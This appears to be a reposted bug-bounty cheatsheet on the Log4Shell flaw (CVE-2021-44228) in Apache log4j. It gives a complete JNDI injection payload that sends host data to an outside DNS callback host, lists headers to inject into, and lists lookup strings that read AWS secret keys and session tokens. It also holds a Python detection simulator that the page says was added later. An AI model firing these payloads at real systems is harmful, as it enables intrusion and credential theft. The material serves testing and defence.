Log4j Vulnerability Cheatsheet
2023-3-8 17:46:7 Author: infosecwriteups.com

How it works, where to practice, and how to identify

Bug Bounty Tip :: Log4j Vulnerability Cheatsheet

The Java logging library log4j has an unauthenticated RCE vulnerability that is triggered when a user-controlled string is logged: CVE-2021-44228 (Log4Shell).

Affected versions: Apache log4j 2.0-beta9 through 2.14.1

A specially crafted payload is injected into headers, input fields, or query/body parameters, for example:

https://target.com/?test=${jndi:ldap://jv-${sys:java.version}-hn-${hostName}.qwe3er.dnslog.cn/exp}

1. Use a service such as dnslog.cn to create a DNS subdomain for the test. Example: qwe3er.dnslog.cn

2. Use this subdomain to craft the payload and send it with the request. After some time, check the DNS service's request log to confirm a successful callback.

3. You should see a request to the DNS service similar to the following (carrying the host name and Java version): jv-11.0.13-hn-73a957d15746.qwe3er.dnslog.cn
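Why the callback carries the host name and Java version: log4j resolves lookups from the inside out, so `${sys:java.version}` and `${hostName}` are substituted before the outer `${jndi:...}` lookup fires, and the expanded string becomes the LDAP/DNS request. The Python below, added here and not part of the original post, simulates that expansion and applies it as a detection over header values; the request samples and the host values in `HOST_CONTEXT` are constructed.

```python
import re
# Innermost ${...} lookup (no nested braces). log4j 2.x resolves lookups
# from the inside out, so inner ones expand before the outer jndi: one.
_INNER_LOOKUP = re.compile(r"\$\{([^${}]*)\}")
_JNDI_HOST = re.compile(r"\$\{jndi:[a-z]+://([^/:}]+)", re.IGNORECASE)

def expand_lookups(value: str, context: dict) -> str:
    """Simulate what a vulnerable log4j substitutes when logging `value`.
    `context` maps lookup names ('sys:java.version', 'hostName', 'env:X')
    to the values the logging host would supply. Unknown lookups stay as-is;
    the jndi: lookup is left unresolved so the caller sees what would be
    handed to JNDI (and therefore leak in the DNS/LDAP request)."""
    def resolve(m):
        name = m.group(1)
        if name.startswith("jndi:"):
            return m.group(0)
        return context.get(name, m.group(0))
    prev = None
    while prev != value:  # repeat until no lookup changes any more
        prev, value = value, _INNER_LOOKUP.sub(resolve, value)
    return value

def callback_host(value: str):
    """Host a jndi: lookup would contact, or None if there is none."""
    m = _JNDI_HOST.search(value)
    return m.group(1) if m else None

def scan_headers(headers: dict, context: dict) -> list:
    """Return (header, kind, expanded) for every header value carrying a
    lookup: 'jndi' = Log4Shell callback trigger, 'lookup' = other ${...}
    such as ${env:AWS_SECRET_ACCESS_KEY} that still reads host data."""
    findings = []
    for name, raw in headers.items():
        if "${" in raw:
            expanded = expand_lookups(raw, context)
            kind = "jndi" if callback_host(expanded) else "lookup"
            findings.append((name, kind, expanded))
    return findings

# Constructed sample header sets as a reverse proxy might log them; the
# second carries the page's DNS-callback probe, the third an env lookup.
SAMPLE_REQUESTS = [
    {"User-Agent": "Mozilla/5.0", "X-Forwarded-For": "198.51.100.4"},
    {"User-Agent": "${jndi:ldap://jv-${sys:java.version}-hn-${hostName}"
                   ".qwe3er.dnslog.cn/exp}"},
    {"Referer": "https://example.test/?k=${env:AWS_SECRET_ACCESS_KEY}"},
]
# Simulated values the vulnerable host would substitute (constructed).
HOST_CONTEXT = {"sys:java.version": "11.0.13", "hostName": "73a957d15746",
                "env:AWS_SECRET_ACCESS_KEY": "<redacted>"}
```

Running `scan_headers` over each entry of `SAMPLE_REQUESTS` flags the second as a `jndi` callback to jv-11.0.13-hn-73a957d15746.qwe3er.dnslog.cn and the third as a plain `lookup`; the first yields nothing.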

You can use the provided test environments to inspect the behavior of this vulnerability.

You can use the following challenges and labs (rooms) to practice this vulnerability.

You can use these websites to create a DNS address (token) for your payload:

https://canarytokens.org (use Token Type: Log4Shell)

https://dnslog.cn

https://app.interactsh.com

You can use these scanners to check whether the target website is vulnerable.

Injection points: email header, username, password, e-mail address, filename, query/body, file content, document/image EXIF, or any of these headers:

Authorization
Cache-Control
Cf-Connecting-Ip
Client-Ip
Contact
Cookie
Forwarded-For-Ip
Forwarded-For
Forwarded
If-Modified-Since
Originating-Ip
Referer
True-Client-Ip
User-Agent
X-Api-Version
X-Client-Ip
X-Forwarded-For
X-Leakix
X-Originating-Ip
X-Real-Ip
X-Remote-Addr
X-Remote-Ip
X-Wap-Profile
Authorization: Basic
Authorization: Bearer
Authorization: Oauth
Authorization: Token
${hostName}
${sys:user.name}
${sys:user.home}
${sys:user.dir}
${sys:java.home}
${sys:java.vendor}
${sys:java.version}
${sys:java.vendor.url}
${sys:java.vm.version}
${sys:java.vm.vendor}
${sys:java.vm.name}
${sys:os.name}
${sys:os.arch}
${sys:os.version}
${env:JAVA_VERSION}
${env:AWS_SECRET_ACCESS_KEY}
${env:AWS_SESSION_TOKEN}
${env:AWS_SHARED_CREDENTIALS_FILE}
${env:AWS_WEB_IDENTITY_TOKEN_FILE}
${env:AWS_PROFILE}
${env:AWS_CONFIG_FILE}
${env:AWS_ACCESS_KEY_ID}

Source: https://infosecwriteups.com/log4j-vulnerability-cheatsheet-66b7aeabc607?source=rss----7b722bfd1b8d--bug_bounty